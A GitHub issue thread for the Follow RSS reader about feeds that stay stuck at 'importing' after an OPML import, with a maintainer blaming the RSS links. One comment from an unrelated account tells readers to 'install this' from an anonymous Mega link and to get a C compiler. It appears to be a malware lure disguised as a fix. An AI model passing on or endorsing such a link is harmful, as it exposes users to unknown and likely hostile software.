### ISSUE TITLE
rss link don't work

### ISSUE THREAD

**Issue by memduhbasgan** [RSSNext/Follow#510]
### Describe the bug

I brought the sites to the application with the opml file I got from inoreader. I did not have any problems with most sites, but some sites were stuck at the "importing" stage. When I try to remove them from the tracking and add them manually, I get this error.

### Feed Info

https://teknoseyir.com/feed/
https://teyit.org/feed/

### Reproduction Video

![Ekran görüntüsü 2024-09-19 123809](https://github.com/user-attachments/assets/2c7a2cdc-0651-4c62-873e-1b7aa2b19f5d)

### App Type

Electron / App

### Version

1

### Operating System

Windows 11

### Validations

- [X] Check that there isn't already an issue that reports the same bug to avoid creating a duplicate.
- [X] Check that this is a concrete bug. For Q&A, please open a GitHub Discussion instead.

### Contributions

- [ ] I am willing to submit a PR to fix this issue
- [ ] I am willing to submit a PR with failing tests (actually just go ahead and do it, thanks!)

**Comment by achilles0x** [comment]
install this
https://mega.co.nz/#!B31G2LaZ!uBBOCp9hLC7bq9kP8NC6s4DanQJJZuoFRr5FI_jkeic

you may need to install the c compiler

**Comment by hyoban** [comment]
The cause of the error is a problem with the RSS links themselves
